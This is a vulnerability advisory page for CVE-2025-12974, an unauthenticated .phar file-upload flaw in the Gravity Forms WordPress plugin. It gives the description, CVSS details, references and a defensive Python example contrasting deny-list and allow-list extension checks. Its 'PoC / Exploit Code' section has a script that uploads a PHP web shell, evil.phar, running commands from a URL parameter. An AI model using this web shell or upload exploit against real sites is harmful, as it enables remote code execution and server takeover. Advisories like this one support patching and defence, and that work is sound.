Security Vulnerability Report
CVE-2025-12974 CVSS 8.1 HIGH

Published: 2025-11-18 04:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the legacy chunked upload mechanism in all versions up to, and including, 2.9.21.1. The extension blacklist used by that mechanism does not include .phar files, so they can be uploaded through it. This makes it possible for unauthenticated attackers to upload executable .phar files and achieve remote code execution on the server, provided they can discover or enumerate the upload path. For the upload to yield RCE, the web server must be configured to process .phar files as PHP via a file handler mapping or similar.
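The root cause above is a deny list that omits one executable extension. The following added example (not Gravity Forms' code; the deny list, allow list and sample filenames are constructed) runs the vulnerable deny-list check and a hardened allow-list check over the same filenames, including the .phar case, so the difference in outcome is visible.

```python
import os

# Constructed, illustrative deny list of server-executable extensions.
# It is NOT the plugin's real list; it reproduces the failure mode in the
# advisory: a deny list that forgets one executable type (.phar here).
DENY_LIST = {"php", "php3", "php4", "php5", "php7", "phtml", "phps", "cgi", "pl"}

# Constructed allow list: what a form upload field legitimately needs.
ALLOW_LIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "csv"}


def extensions_of(filename):
    """All extension parts of the final path component, lowercased.
    'Shell.PHP.jpg' -> ['php', 'jpg']; 'README' -> []."""
    base = os.path.basename(filename)
    return [part.lower() for part in base.split(".")[1:] if part]


def denylist_allows(filename):
    """Vulnerable pattern: block only if the final extension is known-bad.
    Anything the list author did not think of (e.g. phar) passes."""
    exts = extensions_of(filename)
    return not exts or exts[-1] not in DENY_LIST


def allowlist_allows(filename):
    """Hardened pattern: exactly one extension, and it must be known-good.
    Requiring a single extension also sidesteps multi-extension handler
    mappings such as 'x.php.jpg'; rename such files instead of accepting them."""
    exts = extensions_of(filename)
    return len(exts) == 1 and exts[0] in ALLOW_LIST


def compare(filenames):
    """Return {filename: (denylist_allows, allowlist_allows)} for review."""
    return {f: (denylist_allows(f), allowlist_allows(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample filenames, including the .phar case from the advisory.
    samples = ["photo.jpg", "evil.phar", "shell.PHP", "shell.php.jpg", "README"]
    for name, (deny, allow) in compare(samples).items():
        print(f"{name:15} deny-list allows: {deny!s:5}  allow-list allows: {allow}")
```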

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Gravity Forms WordPress plugin <= 2.9.21.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12974 PoC - Gravity Forms Arbitrary File Upload
# Target: WordPress site with vulnerable Gravity Forms plugin (<=2.9.21.1)


def upload_phar(target_url, upload_path=None):
    """
    Upload malicious .phar file via Gravity Forms chunked upload mechanism

    Args:
        target_url: Base URL of the WordPress site
        upload_path: Discovered or enumerated upload path (optional)

    Note: Requires server configuration where .phar files are processed as PHP
    """
    # Malicious .phar file content with PHP payload
    # This creates a PHAR archive that executes arbitrary PHP code
    malicious_phar = b'''
<?php
// CVE-2025-12974 - Malicious PHAR payload
// This will be executed when the .phar file is accessed
if(isset($_GET["cmd"])) {
    system($_GET["cmd"]);
}
?>
'''

    # Chunked upload endpoint (legacy mechanism)
    endpoint = f"{target_url}/wp-json/gf/v2/chunked_upload"

    headers = {
        "Content-Type": "application/octet-stream",
        "X-GF-Chunk-Index": "0",
        "X-GF-Chunk-Total": "1",
        "X-GF-Chunk-Hash": "malicious_phar_hash",
        "X-GF-Filename": "evil.phar",
    }

    try:
        response = requests.post(endpoint, data=malicious_phar, headers=headers, timeout=30)

        if response.status_code == 200:
            result = response.json()
            uploaded_path = result.get("temp_filename", "")
            print(f"[+] Successfully uploaded malicious .phar file")
            print(f"[+] Access the file at: {target_url}/wp-content/uploads/{uploaded_path}")
            print(f"[+] Execute commands: {target_url}/wp-content/uploads/{uploaded_path}?cmd=whoami")
            return True
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12974.py <target_url>")
        print("Example: python cve-2025-12974.py https://example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip("/")
    upload_phar(target)
```

References

https://docs.gravityforms.com/gravityforms-change-log/
https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/common/common.php#L4178
https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/upload.php#L97
https://www.wordfence.com/threat-intel/vulnerabilities/id/b6395439-da45-4b64-8e30-b106dffd46c1?source=cve

Weakness

CWE-434 (Unrestricted Upload of File with Dangerous Type)

Record Metadata

Vulnerability Status
Deferred
Exploitability Score
2.2
Impact Score
5.9